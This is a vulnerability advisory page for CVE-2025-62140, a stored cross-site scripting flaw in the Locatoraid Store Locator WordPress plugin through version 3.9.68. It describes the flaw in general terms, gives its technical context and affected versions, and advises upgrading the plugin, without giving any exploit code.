CVE-2025-62140
Lifecycle Timeline
2Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in plainware Locatoraid Store Locator locatoraid allows Stored XSS.This issue affects Locatoraid Store Locator: from n/a through <= 3.9.68.
Analysis
Stored cross-site scripting (XSS) in plainware Locatoraid Store Locator WordPress plugin versions up to 3.9.68 allows attackers to inject malicious scripts into web pages viewed by other users. The vulnerability affects the plugin's input handling during web page generation, enabling persistent XSS attacks. With an EPSS score of 0.01% and no active exploitation confirmed, this represents a low-probability but persistent risk requiring plugin updates.
Technical Context
The vulnerability stems from improper neutralization of user input (CWE-79) in the Locatoraid Store Locator plugin, a WordPress extension used to display store location information. The plugin fails to adequately sanitize or escape user-supplied data before rendering it in HTML output, allowing attackers to embed arbitrary JavaScript that executes in the browser context of subsequent users viewing the affected content. This is a stored XSS variant, meaning the malicious payload persists in the application database and affects all users who access the compromised data, unlike reflected XSS which requires per-victim delivery.
Affected Products
The plainware Locatoraid Store Locator WordPress plugin is affected in all versions from an unspecified baseline through version 3.9.68 inclusive. The plugin serves as a geolocation tool for WordPress sites to display store locations to visitors. Exact CPE information is not independently confirmed in the provided references, though the vulnerability is documented in the Patchstack vulnerability database under the WordPress plugin category.
Remediation
Upgrade the Locatoraid Store Locator plugin to a version newer than 3.9.68 immediately. Check the official WordPress plugin repository or the vendor's update mechanism for the latest patched release. If automatic plugin updates are enabled, the patch should be deployed automatically; otherwise, administrators should manually trigger the update through the WordPress dashboard (Plugins → Updates). Until patching is complete, restrict plugin functionality or disable the plugin if not actively in use. The vulnerability details and remediation guidance are available via the Patchstack advisory referenced in the vulnerability database.
Priority Score
Share
External POC / Exploit Code
Leaving vuln.today